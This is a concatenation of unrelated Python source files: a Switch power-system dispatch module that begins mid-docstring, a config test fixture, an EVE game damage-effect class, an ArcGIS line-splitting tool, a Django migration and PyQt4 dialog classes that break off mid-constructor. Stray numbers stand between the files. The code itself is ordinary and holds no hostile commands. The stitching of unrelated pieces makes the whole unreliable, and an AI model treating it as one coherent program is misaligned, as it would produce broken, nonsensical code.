ProjCapacity but indexed by timepoint rather than period to allow more compact statements. DispatchProj[(proj, t) in PROJ_DISPATCH_POINTS] is the set of generation dispatch decisions: how much average power in MW to produce in each timepoint. This value can be multiplied by the duration of the timepoint in hours to determine the energy produced by a project in a timepoint. This will need to have another index of energy_source to fully support generators that use multiple fuels. proj_availability[prj] describes the fraction of a time a project is expected to be available. This is derived from the forced and scheduled outage rates of generation technologies. 
For baseload or flexible baseload, this is determined from both forced and scheduled outage rates. For all other types of generation technologies, we assume the scheduled outages can be performed when the generators were not scheduled to produce power, so their availability is only derated based on their forced outage rates. prj_max_capacity_factor[prj, t] is defined for variable renewable projects and is the ratio of average power output to nameplate capacity in that timepoint. Most renewable capacity factors should be in the range of 0 to 1. Some solar capacity factors will be above 1 because the nameplate capacity is based on solar radiation of 1.0 kW/m^2 and solar radiation can exceed that value on very clear days or on partially cloudy days when light bounces off the bottom of clouds onto a solar panel. Some solar thermal capacity factors can be less than 0 because of auxillary loads: for example, parts of those plants need to be kept warm during winter nights to avoid freezing. Those heating loads can be significant during certain timepoints. proj_variable_om[proj] is the variable Operations and Maintenance costs (O&M) per MWh of dispatched capacity for a given project. Proj_Var_Costs_Hourly[t in TIMEPOINTS] is the sum of all variable costs associated with project dispatch for each timepoint expressed in $base_year/hour in the future period (rather than Net Present Value). PROJ_FUEL_DISPATCH_POINTS is a subset of PROJ_DISPATCH_POINTS for projects that consume fuel and could produce emissions. ProjFuelUseRate[(proj, t) in PROJ_FUEL_DISPATCH_POINTS] is a variable that describes fuel consumption rate in MMBTU/h. This should be constrained to the fuel consumed by a project in each timepoint and can be calculated as Dispatch [MW] * effective_heat_rate [MMBTU/MWh] -> [MMBTU/h]. The choice of how to constrain it depends on the treatment of unit commitment. 
Currently the project.no_commit module implements a simple treatment that ignores unit commitment and assumes a full load heat rate, while the project.unitcommit module implements unit commitment decisions with startup fuel requirements and a marginal heat rate. DispatchEmissions[(proj, t) in PROJ_FUEL_DISPATCH_POINTS] is the emissions produced by dispatching a fuel-based project in units of metric tonnes CO2 per hour. This is derived from the fuel consumption ProjFuelUseRate, the fuel's direct carbon intensity, the fuel's upstream emissions, as well as Carbon Capture efficiency for generators that implement Carbon Capture and Sequestration. This does not yet support multi-fuel generators. --- Delayed implementation, possibly relegated to other modules. --- Flexible baseload support for plants that can ramp slowly over the course of days. These kinds of generators can provide important seasonal support in high renewable and low emission futures. Parasitic loads that make solar thermal plants consume energy from the grid on cold nights to keep their fluids from getting too cold. Storage support. Hybrid project support (pumped hydro & CAES) will eventually get implemented in separate modules. """ # I might be able to simplify this, but the current formulation # should exclude any timepoints in periods in which a project will # definitely be retired. 
    # Enumerate (project, timepoint) pairs only for periods in which the
    # project has capacity online; this implicitly excludes timepoints in
    # periods where the project will definitely be retired.
    def init_dispatch_timepoints(m):
        dispatch_timepoints = set()
        for (proj, bld_yr) in m.PROJECT_BUILDYEARS:
            for period in m.PROJECT_BUILDS_OPERATIONAL_PERIODS[proj, bld_yr]:
                for t in m.TIMEPOINTS:
                    if(m.tp_period[t] == period):
                        dispatch_timepoints.add((proj, t))
        return dispatch_timepoints
    mod.PROJ_DISPATCH_POINTS = Set(
        dimen=2, initialize=init_dispatch_timepoints)
    # Capacity re-indexed by timepoint (rather than period) for compactness.
    mod.ProjCapacityTP = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: m.ProjCapacity[proj, m.tp_period[t]])
    mod.DispatchProj = Var(
        mod.PROJ_DISPATCH_POINTS,
        within=NonNegativeReals)
    mod.LZ_NetDispatch = Expression(
        mod.LOAD_ZONES, mod.TIMEPOINTS,
        initialize=lambda m, lz, t: sum(
            m.DispatchProj[p, t] for p in m.LZ_PROJECTS[lz]
            if (p, t) in m.PROJ_DISPATCH_POINTS))
    # Register net dispatch as contributing to a load zone's energy
    mod.LZ_Energy_Balance_components.append('LZ_NetDispatch')

    # Baseload/flexible-baseload plants are derated for both forced and
    # scheduled outages; all other technologies only for forced outages,
    # on the assumption scheduled maintenance happens off-dispatch.
    def init_proj_availability(model, project):
        tech = model.proj_gen_tech[project]
        if(model.g_is_baseload[tech] or
           model.g_is_flexible_baseload[tech]):
            return (1 - model.g_forced_outage_rate[tech]) * (
                1 - model.g_scheduled_outage_rate[tech])
        else:
            return (1 - model.g_forced_outage_rate[tech])
    mod.proj_availability = Param(
        mod.PROJECTS,
        within=PositiveReals,
        initialize=init_proj_availability)

    mod.VAR_DISPATCH_POINTS = Set(
        initialize=mod.PROJ_DISPATCH_POINTS,
        filter=lambda m, proj, t: proj in m.VARIABLE_PROJECTS)
    # Capacity factors may legitimately fall slightly outside [0, 1]
    # (solar over-irradiance, auxiliary loads), hence the (-1, 2) bounds.
    mod.prj_max_capacity_factor = Param(
        mod.VAR_DISPATCH_POINTS,
        within=Reals,
        validate=lambda m, val, proj, t: -1 < val < 2)
    mod.min_data_check('prj_max_capacity_factor')
    # Defaults to the technology's generic O&M scaled by the load zone's
    # cost multiplier; may be overridden per-project via input file.
    mod.proj_variable_om = Param(
        mod.PROJECTS,
        within=NonNegativeReals,
        default=lambda m, proj: (
            m.g_variable_o_m[m.proj_gen_tech[proj]] *
            m.lz_cost_multipliers[m.proj_load_zone[proj]]))

    mod.PROJ_FUEL_DISPATCH_POINTS = Set(
        initialize=mod.PROJ_DISPATCH_POINTS,
        filter=lambda m, proj, t: proj in m.FUEL_BASED_PROJECTS)
    # Fuel consumption rate in MMBTU/h; constrained elsewhere by either
    # project.no_commit or project.unitcommit.
    mod.ProjFuelUseRate = Var(
        mod.PROJ_FUEL_DISPATCH_POINTS,
        within=NonNegativeReals)

    # Net emissions (tCO2/h): direct intensity less upstream credit, with
    # the direct term scaled down by CCS capture efficiency for CCS techs.
    def DispatchEmissions_rule(m, proj, t):
        g = m.proj_gen_tech[proj]
        f = m.proj_fuel[proj]
        if g not in m.CCS_TECHNOLOGIES:
            return (
                m.ProjFuelUseRate[proj, t] *
                (m.f_co2_intensity[f] - m.f_upstream_co2_intensity[f]))
        else:
            ccs_emission_frac = 1 - m.g_ccs_capture_efficiency[g]
            return (
                m.ProjFuelUseRate[proj, t] *
                (m.f_co2_intensity[f] * ccs_emission_frac -
                 m.f_upstream_co2_intensity[f]))
    mod.DispatchEmissions = Expression(
        mod.PROJ_FUEL_DISPATCH_POINTS,
        initialize=DispatchEmissions_rule)

    mod.Proj_Var_Costs_Hourly = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: (
            m.DispatchProj[proj, t] * m.proj_variable_om[proj]))
    # An expression to summarize costs for the objective function. Units
    # should be total future costs in $base_year real dollars. The
    # objective function will convert these to base_year Net Present
    # Value in $base_year real dollars.
    # NOTE(review): this scans every (proj, t2) pair per timepoint, which
    # is O(|TIMEPOINTS| * |PROJ_DISPATCH_POINTS|) at model build time.
    mod.Total_Proj_Var_Costs_Hourly = Expression(
        mod.TIMEPOINTS,
        initialize=lambda m, t: sum(
            m.Proj_Var_Costs_Hourly[proj, t]
            for (proj, t2) in m.PROJ_DISPATCH_POINTS
            if t == t2))
    mod.cost_components_tp.append('Total_Proj_Var_Costs_Hourly')


def load_inputs(mod, switch_data, inputs_dir):
    """
    Import project-specific data from an input directory. Both files are
    optional.

    variable_capacity_factors.tab can be skipped if no variable
    renewable projects are considered in the optimization.

    variable_capacity_factors.tab
        PROJECT, timepoint, prj_capacity_factor

    proj_variable_costs.tab is optional and overrides generic costs for
    generators. Load-zone cost adjustments will not be applied to any
    costs specified in this file.

    proj_variable_costs.tab
        PROJECT, proj_variable_om
    """
    switch_data.load_aug(
        optional=True,
        filename=os.path.join(inputs_dir, 'variable_capacity_factors.tab'),
        select=('PROJECT', 'timepoint', 'prj_capacity_factor'),
        param=(mod.prj_max_capacity_factor))
    switch_data.load_aug(
        optional=True,
        filename=os.path.join(inputs_dir, 'proj_variable_costs.tab'),
        select=('PROJECT', 'proj_variable_om'),
        param=(mod.proj_variable_om))


def save_results(model, instance, outdir):
    """
    Export results to standard files.

    This initial placeholder version is integrating snippets of some of
    Matthias's code into the main codebase.
    """
    import switch_mod.export as export
    # NOTE(review): the output path hardcodes "outputs" and ignores the
    # outdir argument -- confirm whether outdir should be used here.
    export.write_table(
        instance, instance.TIMEPOINTS,
        output_file=os.path.join("outputs", "dispatch.txt"),
        headings=("timestamp",)+tuple(instance.PROJECTS),
        values=lambda m, t: (m.tp_timestamp[t],) + tuple(
            m.DispatchProj[p, t] if (p, t) in m.PROJ_DISPATCH_POINTS
            else 0.0
            for p in m.PROJECTS
        )
    )
0
#
# Copyright 2013 Mirantis, Inc.
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import fixtures
import six

from essential.config import cfg


class Config(fixtures.Fixture):
    """Fixture that lets a test override configuration settings.

    Every override and option registration made through this fixture is
    undone on cleanup, and `conf` itself is reset.
    """

    def __init__(self, conf=cfg.CONF):
        self.conf = conf

    def setUp(self):
        super(Config, self).setUp()
        # Cleanups run in reverse registration order, so the unregister
        # step is added *before* the reset step: the conf must be reset
        # first, and only then can the options be unregistered.
        self.addCleanup(self._unregister_config_opts)
        self.addCleanup(self.conf.reset)
        self._registered_config_opts = {}

    def config(self, **kw):
        """Override configuration values for the duration of the test.

        Each keyword argument names an option to override and gives its
        value. A `group` keyword, when present, selects the option group
        the overrides apply to; otherwise the ``default`` group is used.
        """
        group = kw.pop('group', None)
        for opt_name, opt_value in six.iteritems(kw):
            self.conf.set_override(opt_name, opt_value, group)

    def _unregister_config_opts(self):
        # Undo every register_opt()/register_opts() call, group by group.
        for group, opts in self._registered_config_opts.items():
            self.conf.unregister_opts(opts, group=group)

    def register_opt(self, opt, group=None):
        """Register a single option for the test run.

        The option is unregistered automatically during cleanup. A
        `group` argument registers it to that group; otherwise it goes
        to the ``default`` group.
        """
        self.conf.register_opt(opt, group=group)
        self._registered_config_opts.setdefault(group, set()).add(opt)

    def register_opts(self, opts, group=None):
        """Register a list of options for the test run.

        Behaves like register_opt() applied to each option; all options
        share the same `group` (or the ``default`` group if omitted).
        """
        for single_opt in opts:
            self.register_opt(single_opt, group=group)
0
# ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================


from eos.const.eve import AttrId
from eos.const.eve import EffectId
from eos.eve_obj.effect import EffectFactory
from eos.stats_container import DmgStats

from .base import DmgDealerEffect


class EmpWave(DmgDealerEffect):
    """Damage-dealer effect for smartbomb EMP waves."""

    def get_volley(self, item):
        # Collect the four damage-type attributes off the item in
        # DmgStats argument order, treating missing attributes as zero.
        dmg_attr_ids = (
            AttrId.em_dmg,
            AttrId.therm_dmg,
            AttrId.kin_dmg,
            AttrId.expl_dmg)
        dmg_amounts = [item.attrs.get(attr_id, 0) for attr_id in dmg_attr_ids]
        return DmgStats(*dmg_amounts)

    def get_applied_volley(self, item, tgt_data):
        raise NotImplementedError


EffectFactory.register_class_by_id(
    EmpWave, EffectId.emp_wave)
#######################################################################
# SplitLineModule
#
# Purpose: Split line at points spaced at regular intervals
#
# Created by: Cara Walter
# Includes code modified from OSU GEO 599 course materials and
# http://stackoverflow.com/questions/3579568/choosing-a-file-in-python-simple-gui
#
# Input:
#   TheInFile: polyline feature class with 1 continuous line
#   TheOutFilePath: folder path for the output shapefiles
#   SplitLength: interval at which to split the input line
#   AsArcGISTool: 1 when running as a GIS tool, 0 otherwise (controls messaging)
#   FlipLine: 0 when the centerline start matches the desired start, 1 when
#             it is actually the end
#
# Outputs (name same as input shapefile with suffix):
#   _single.shp          merged input when it had more than one polyline
#   _random_points.shp   points along the line at the given spacing
#   _copy_points.shp     duplicated points forming segment start/end pairs
#   _segmented_line.shp  the output split polylines
#
# Returns: path to _segmented_line.shp, whose "Station" field holds each
# segment's distance from the line start.
#
# arcpy.management.SplitLineAtPoint supposedly does some of this, but it
# is unreliable for lots of splits.
#
# Modified: 3/18/2013
#######################################################################

def SplitLine(TheInFile, TheOutFilePath, SplitLength, AsArcGISTool, FlipLine):
    """Split a continuous polyline into segments of SplitLength.

    Returns the segmented-line shapefile path; raises RuntimeError on any
    failure (including a discontinuous input line).
    """
    try:
        import os
        import ManagementInterface as MgmtGIS
        import ShapefileProperties as ShpProp
        from MessagingModule import MessageSwitch

        # --- Setup classes and file output ---
        MgmtInterface = MgmtGIS.ManagementInterface()
        # Extract just the file name
        TheFileName = os.path.basename(TheInFile)
        # Create the output folder if it does not exist yet
        if os.path.isdir(TheOutFilePath) != True:
            os.mkdir(TheOutFilePath)

        # --- Ensure the input is a single continuous feature ---
        NumFeatures = MgmtInterface.CountRows(TheInFile)
        if NumFeatures > 1:
            PolylineSingle = TheOutFilePath + TheFileName[0:-4] + "_single.shp"
            # Merge lines only if they will be single part and therefore continuous
            MgmtInterface.Dissolve(TheInFile, PolylineSingle, "#", "#",
                                   "SINGLE_PART", "UNSPLIT_LINES")
        else:
            PolylineSingle = TheInFile
        # Count features again to make sure the input line is continuous
        NumFeaturesSingle = MgmtInterface.CountRows(PolylineSingle)
        if NumFeaturesSingle > 1:
            message = "Error: Input line is more than 1 feature and not continuous"
            # BUGFIX: argument order normalized to match every other
            # MessageSwitch call in this function (the original passed
            # (message, AsArcGISTool) here only) -- confirm against
            # MessagingModule.
            MessageSwitch(AsArcGISTool, message)
            # BUGFIX: was "x=1/0" to force an exception, which reported a
            # ZeroDivisionError instead of the real problem; raise directly
            # so the outer handler carries the actual message.
            raise RuntimeError(message)

        # --- Create evenly spaced points along the input polyline ---
        message = "Creating evenly spaced points along\n " + TheFileName + " \nat " + format(SplitLength) + " interval..."
        MessageSwitch(AsArcGISTool, message)
        # Determine input line length and the number of split points
        LineLength = ShpProp.Length(PolylineSingle)
        PointNumber = (int(int(LineLength[0] + 1) / SplitLength))
        PointName = TheFileName[0:-4] + "_random_points.shp"
        # Constrain point creation along the input line by count and spacing
        MgmtInterface.RandomPts(
            TheOutFilePath, PointName, PolylineSingle, "", PointNumber,
            SplitLength, "POINT", "")

        # --- Duplicate points so each segment gets a start and end point ---
        # The CID field (derived from FID) is the unique line identifier for
        # the Points-to-Line step.
        message = "Creating duplicate points as end points for segmented lines..."
        MessageSwitch(AsArcGISTool, message)
        if FlipLine == 0:
            # Centerline start is at the desired output line start
            MgmtInterface.WriteField(TheOutFilePath + PointName, "CID",
                                     "[FID]", "VB")
        else:
            # Centerline start is at the end of the desired output line
            MgmtInterface.WriteField(TheOutFilePath + PointName, "CID",
                                     format(PointNumber - 1) + "-[FID]", "VB")
        # Select all but the first point and copy to a new shapefile -
        # duplicate points will be the end points of each line segment
        MgmtInterface.CreateLayer(TheOutFilePath + PointName, "Point_layer")
        SQLstatement = "\"CID\" <> 0"
        MgmtInterface.SelectUsingAttributes("Point_layer", "NEW_SELECTION",
                                            SQLstatement)
        PointNameCopy = TheOutFilePath + TheFileName[0:-4] + "_copy_points.shp"
        MgmtInterface.CopyFeatures("Point_layer", PointNameCopy)
        # Subtract 1 from CID to treat the duplicates as segment "end" points
        MgmtInterface.WriteField(PointNameCopy, "CID", "[CID] - 1", "VB")

        # --- Combine original and duplicate points ---
        message = "Combining original and duplicate points..."
        MessageSwitch(AsArcGISTool, message)
        # Append originals to the copies, excluding the last point (it never
        # starts a segment)
        SQLstatement2 = "\"CID\" <> " + format(PointNumber - 1)
        MgmtInterface.SelectUsingAttributes("Point_layer", "NEW_SELECTION",
                                            SQLstatement2)
        MgmtInterface.Append("Point_layer", PointNameCopy)

        # --- Create line segments from the point pairs and add stationing ---
        message = "Creating line segments from points..."
        MessageSwitch(AsArcGISTool, message)
        LineSegmented = TheOutFilePath + TheFileName[0:-4] + "_segmented_line.shp"
        MgmtInterface.Points2Line(PointNameCopy, LineSegmented, "CID", "#")
        # Station = distance of the segment start from the line start
        MgmtInterface.AddField(LineSegmented, "Station", "DOUBLE", 10, 2, "#")
        MgmtInterface.WriteField(LineSegmented, "Station",
                                 "!shape.length! * !CID!", "PYTHON")
        # Clean up the temporary feature layer
        MgmtInterface.Delete("Point_layer")

        message = "Split Line completed."
        MessageSwitch(AsArcGISTool, message)
        return(LineSegmented)

    # Re-raise with context so callers (and ArcGIS) see a clear message
    except Exception as TheError:
        raise RuntimeError("An error has occurred: " + format(TheError))
0.037523
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-16 20:50
# NOTE: auto-generated migration - schema changes belong in the models,
# not in edits to this file.
from __future__ import unicode_literals

from django.db import migrations


class Migration(migrations.Migration):
    # Drops the FuelSupplierAttachmentTag/CCData/Contact and Notification*
    # models (FK columns must be removed first so the tables can be deleted)
    # and renames the various *expirationDate/endDate columns to the
    # snake_case name expiration_date.

    dependencies = [
        ('api', '0020_auto_20171102_1457'),
    ]

    operations = [
        # Strip FK/audit columns before the DeleteModel operations below.
        migrations.RemoveField(
            model_name='fuelsupplierattachmenttag',
            name='create_user',
        ),
        migrations.RemoveField(
            model_name='fuelsupplierattachmenttag',
            name='fuelSupplierAttachmentFK',
        ),
        migrations.RemoveField(
            model_name='fuelsupplierattachmenttag',
            name='update_user',
        ),
        migrations.RemoveField(
            model_name='fuelsupplierccdata',
            name='create_user',
        ),
        migrations.RemoveField(
            model_name='fuelsupplierccdata',
            name='fuelSupplierFK',
        ),
        migrations.RemoveField(
            model_name='fuelsupplierccdata',
            name='update_user',
        ),
        migrations.RemoveField(
            model_name='fuelsuppliercontact',
            name='create_user',
        ),
        migrations.RemoveField(
            model_name='fuelsuppliercontact',
            name='fuelSupplierFK',
        ),
        migrations.RemoveField(
            model_name='fuelsuppliercontact',
            name='update_user',
        ),
        migrations.RemoveField(
            model_name='fuelsuppliercontact',
            name='userFK',
        ),
        migrations.RemoveField(
            model_name='notification',
            name='create_user',
        ),
        migrations.RemoveField(
            model_name='notification',
            name='notificationEventFK',
        ),
        migrations.RemoveField(
            model_name='notification',
            name='update_user',
        ),
        migrations.RemoveField(
            model_name='notification',
            name='userFK',
        ),
        migrations.RemoveField(
            model_name='notificationevent',
            name='create_user',
        ),
        migrations.RemoveField(
            model_name='notificationevent',
            name='creditTradeFK',
        ),
        migrations.RemoveField(
            model_name='notificationevent',
            name='update_user',
        ),
        migrations.RemoveField(
            model_name='notificationtype',
            name='create_user',
        ),
        migrations.RemoveField(
            model_name='notificationtype',
            name='update_user',
        ),
        # camelCase -> snake_case column renames; note fuelsupplierbalance
        # renames endDate (not expirationDate) to expiration_date.
        migrations.RenameField(
            model_name='credittradestatus',
            old_name='expirationDate',
            new_name='expiration_date',
        ),
        migrations.RenameField(
            model_name='credittradetype',
            old_name='expirationDate',
            new_name='expiration_date',
        ),
        migrations.RenameField(
            model_name='credittradezeroreason',
            old_name='expirationDate',
            new_name='expiration_date',
        ),
        migrations.RenameField(
            model_name='fuelsupplieractionstype',
            old_name='expirationDate',
            new_name='expiration_date',
        ),
        migrations.RenameField(
            model_name='fuelsupplierbalance',
            old_name='endDate',
            new_name='expiration_date',
        ),
        migrations.RenameField(
            model_name='fuelsupplierstatus',
            old_name='expirationDate',
            new_name='expiration_date',
        ),
        # Finally drop the now column-less models.
        migrations.DeleteModel(
            name='FuelSupplierAttachmentTag',
        ),
        migrations.DeleteModel(
            name='FuelSupplierCCData',
        ),
        migrations.DeleteModel(
            name='FuelSupplierContact',
        ),
        migrations.DeleteModel(
            name='Notification',
        ),
        migrations.DeleteModel(
            name='NotificationEvent',
        ),
        migrations.DeleteModel(
            name='NotificationType',
        ),
    ]
0
#===================================================================================================================================== #Copyright #===================================================================================================================================== #Copyright (C) 2014 Alexander Blaessle, Patrick Mueller and the Friedrich Miescher Laboratory of the Max Planck Society #This software is distributed under the terms of the GNU General Public License. #This file is part of PyFRAP. #PyFRAP is free software: you can redistribute it and/or modify #it under the terms of the GNU General Public License as published by #the Free Software Foundation, either version 3 of the License, or #(at your option) any later version. #This program is distributed in the hope that it will be useful, #but WITHOUT ANY WARRANTY; without even the implied warranty of #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #GNU General Public License for more details. #You should have received a copy of the GNU General Public License #along with this program. If not, see <http://www.gnu.org/licenses/>. 
#===========================================================================================================================================================================
#Module Description
#===========================================================================================================================================================================

#Module containing basic custom PyQT classes:

#1) basicCanvasDialog

#===========================================================================================================================================================================
#Importing necessary modules
#===========================================================================================================================================================================

#Misc
import sys
import time
import os, os.path

#PyFRAP modules (provides printWarning used below)
from pyfrp.modules.pyfrp_term_module import *

#PyQT
from PyQt4 import QtGui, QtCore

#matplotlib
import matplotlib.pyplot as plt
import matplotlib
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas

"""
Apparently the NavigationToolbar naming has changed in newer matplotlib versions, thus we need to
test out some cases.
"""
try:
	from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar
except ImportError:
	try:
		from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
	except ImportError:
		printWarning("Cannot import NavigationToolbar.")

from matplotlib.figure import Figure

#===================================================================================================================================
#Basic Dialog with space for QLEs/Btns on left hand side and canvas on right hand side
#===================================================================================================================================

class basicCanvasDialog(QtGui.QDialog):

	"""Dialog with a widget grid on the left hand side and a matplotlib
	canvas plus Done button on the right hand side.

	Subclasses put their QLEs/buttons into ``self.grid`` and draw onto
	``self.ax``; drawn artists are tracked in ``self.artists``.
	"""

	def __init__(self,parent,xlim=[0,512],ylim=[0,512]):

		# NOTE(review): xlim/ylim are mutable default arguments; harmless as
		# long as no caller mutates them - confirm.

		super(basicCanvasDialog,self).__init__(parent)

		self.dpi = 100
		self.setMinimumSize(1000,500)
		self.resize(1300,500)

		#-------------------------------------------------------------------------------------------------------------------
		#Bookkeeping variables
		#-------------------------------------------------------------------------------------------------------------------

		# All artists currently drawn on the canvas
		self.artists=[]

		#-------------------------------------------------------------------------------------------------------------------
		#Buttons
		#-------------------------------------------------------------------------------------------------------------------

		#Done button (old-style PyQt4 signal connection)
		self.btnDone=QtGui.QPushButton('Done')
		self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed)

		#-------------------------------------------------------------------------------------------------------------------
		#Plot frame
		#-------------------------------------------------------------------------------------------------------------------

		self.plotFrame = QtGui.QWidget()
		self.plotFrame.setMaximumWidth(1)

		#-------------------------------------------------------------------------------------------------------------------
		#Layout
		#-------------------------------------------------------------------------------------------------------------------

		self.grid = QtGui.QGridLayout()
		self.grid.setColumnMinimumWidth(2,200)

		#-------------------------------------------------------------------------------------------------------------------
		#Create Canvas
		#-------------------------------------------------------------------------------------------------------------------

		self.createCanvas(xlim=xlim,ylim=ylim)

		#-------------------------------------------------------------------------------------------------------------------
		#Final Layout
		#-------------------------------------------------------------------------------------------------------------------

		self.vbox = QtGui.QVBoxLayout()
		self.vbox.addWidget(self.canvas)
		self.vbox.addWidget(self.btnDone)

		#Add everything to Horizontal Box
		self.hbox = QtGui.QHBoxLayout()
		self.hbox.addLayout(self.grid)
		self.hbox.addLayout(self.vbox)

		self.setLayout(self.hbox)

		self.setWindowTitle('basicCanvasDialog')
		self.show()

	def createCanvas(self,xlim=None,ylim=None):

		"""Creates a 500x500 px matplotlib figure/canvas inside the plot
		frame and adds a single axes, optionally applying axis limits."""

		h=500/self.dpi
		v=500/self.dpi
		self.fig = Figure( dpi=self.dpi)
		self.fig.set_size_inches(h,v,forward=True)
		self.canvas = FigureCanvas(self.fig)
		self.canvas.setParent(self.plotFrame)

		self.ax = self.fig.add_subplot(111)
		if xlim!=None:
			self.ax.set_xlim(xlim)
		if ylim!=None:
			self.ax.set_ylim(ylim)
		self.canvas.draw()

		#self.plotFrame.adjustSize()

		return

	def showImg(self,img):

		"""Shows image on canvas and sets axis limits from img.shape.

		NOTE(review): x-limits use img.shape[0] and y-limits img.shape[1];
		for a non-square row-major image these look swapped - confirm.
		"""

		self.ax.imshow(img)
		self.ax.set_xlim([1,img.shape[0]])
		self.ax.set_ylim([1,img.shape[1]])
		self.canvas.draw()
		return self.canvas

	def connectCanvas(self):

		"""Connects mouse/keyboard events to the canvas.

		Expects the subclass to define ``getMouseCanvas`` - it is not
		defined in this base class.
		"""

		self.canvas.mpl_connect('button_press_event', self.getMouseCanvas)
		self.canvas.mpl_connect('key_press_event', self.keyPressed)
		self.canvas.setFocusPolicy( QtCore.Qt.ClickFocus )
		self.canvas.setFocus()

	def keyPressed(self):

		"""Default key-press handler; subclasses override to react to keys."""

		printWarning("No Key-Press Action defined.")

	def removeArtist(self,idx=-1):

		"""Removes artist at index ``idx`` (default: last) from canvas and
		bookkeeping list; no-op when there are no artists."""

		if len(self.artists)>0:
			self.artists[idx].remove()
			self.artists.pop(idx)
			self.canvas.draw()
		return self.artists

	def replaceArtist(self,idx,newArtist):

		"""Replaces artist at index ``idx`` with ``newArtist``; appends
		instead when ``idx`` is out of range."""

		if len(self.artists)>idx:
			self.removeArtist(idx=idx)
			self.artists.insert(idx,newArtist)
			self.canvas.draw()
		else:
			self.artists.append(newArtist)
		return self.artists

	def setArtistColor(self,color):

		"""Applies ``color`` to every tracked artist and redraws."""

		for artist in self.artists:
			artist.set_color(color)
		self.canvas.draw()
		return self.artists

	def donePressed(self):

		"""Closes the dialog with result code 1."""

		self.done(1)
		return

#===================================================================================================================================
#Basic Dialog for settings of any kind.
#===================================================================================================================================

class basicSettingsDialog(QtGui.QDialog):

	"""Dialog skeleton for settings: a grid for widgets, a Done button and
	ready-made double/int validators for line edits."""

	def __init__(self,parent):

		super(basicSettingsDialog,self).__init__(parent)

		self.setMinimumSize(500,500)
		self.resize(700,500)

		#-------------------------------------------------------------------------------------------------------------------
		#Buttons
		#-------------------------------------------------------------------------------------------------------------------

		#Done button
		self.btnDone=QtGui.QPushButton('Done')
		self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed)

		#-------------------------------------------------------------------------------------------------------------------
		#Layout
		#-------------------------------------------------------------------------------------------------------------------

		self.grid = QtGui.QGridLayout()
		self.grid.setColumnMinimumWidth(2,20)

		#-------------------------------------------------------------------------------------------------------------------
		#Validators
		#-------------------------------------------------------------------------------------------------------------------

		self.doubleValid=QtGui.QDoubleValidator()
		self.intValid=QtGui.QIntValidator()

		#-------------------------------------------------------------------------------------------------------------------
		#Final Layout
		#-------------------------------------------------------------------------------------------------------------------

		self.vbox = QtGui.QVBoxLayout()
		self.vbox.addLayout(self.grid)

		self.hbox = QtGui.QHBoxLayout()
		self.hbox.addWidget(self.btnDone,stretch=0,alignment=QtCore.Qt.AlignRight)

		self.vbox.addLayout(self.hbox)

		self.setLayout(self.vbox)

		self.setWindowTitle('basicSettingsDialog')

	def donePressed(self):

		"""Closes the dialog with result code 1."""

		self.done(1)
		return

#===================================================================================================================================
#Basic Selector for a single item out of a list
#===================================================================================================================================

class basicSelectorDialog(QtGui.QDialog):

	"""Dialog letting the user pick a single item out of ``List``;
	retrieve the choice via getItem() after exec."""

	def __init__(self,List,parent):

		super(basicSelectorDialog,self).__init__(parent)

		# Currently selected item (None until the user clicks one)
		self.item=None
		self.List=List

		#Done button
		self.btnDone=QtGui.QPushButton('Done')
		self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed)

		#QTreeWidget
		self.ListWidget=QtGui.QTreeWidget()
		self.ListWidget.setColumnWidth(0,100)
		self.ListWidget.itemClicked.connect(self.itemClicked)

		self.updateList()

		#Layout
		self.vbox = QtGui.QVBoxLayout()
		self.vbox.addWidget(self.ListWidget)

		self.hbox = QtGui.QHBoxLayout()
		self.hbox.addWidget(self.btnDone,stretch=0,alignment=QtCore.Qt.AlignRight)

		self.vbox.addLayout(self.hbox)

		self.setLayout(self.vbox)

		self.setWindowTitle('basicSelectorDialog')
		self.show()

	def updateList(self):

		"""Rebuilds the tree widget from ``self.List``."""

		self.ListWidget.clear()
		for r in self.List:
			QtGui.QTreeWidgetItem(self.ListWidget,[r])
		return

	def itemClicked(self):

		"""Remembers the clicked row's entry of ``self.List``."""

		idx=self.ListWidget.indexFromItem(self.ListWidget.currentItem()).row()
		self.item=self.List[idx]

	def getItem(self):

		"""Returns the selected item (None when nothing was clicked)."""

		return self.item

	def donePressed(self):

		"""Closes the dialog with result code 1."""

		self.done(1)
		return

#===================================================================================================================================
#Basic Selector for a list of items out of a list
#===================================================================================================================================

class listSelectorDialog(QtGui.QDialog):

	"""Two-pane selector: items are moved between a left (available) and a
	right (selected) QTreeWidget via arrow buttons or double-click.

	Parameters:
		parent: parent widget.
		List: all selectable items.
		leftTitle/rightTitle: header labels of the two panes.
		itemsRight: items that start out selected (default: none).

	Retrieve the selection via getSelection() after exec.
	"""

	def __init__(self,parent,List,leftTitle="",rightTitle="",itemsRight=None):

		super(listSelectorDialog,self).__init__(parent)

		# FIX: itemsRight used to default to a mutable [] shared across all
		# instances; an explicitly passed list is still aliased as before.
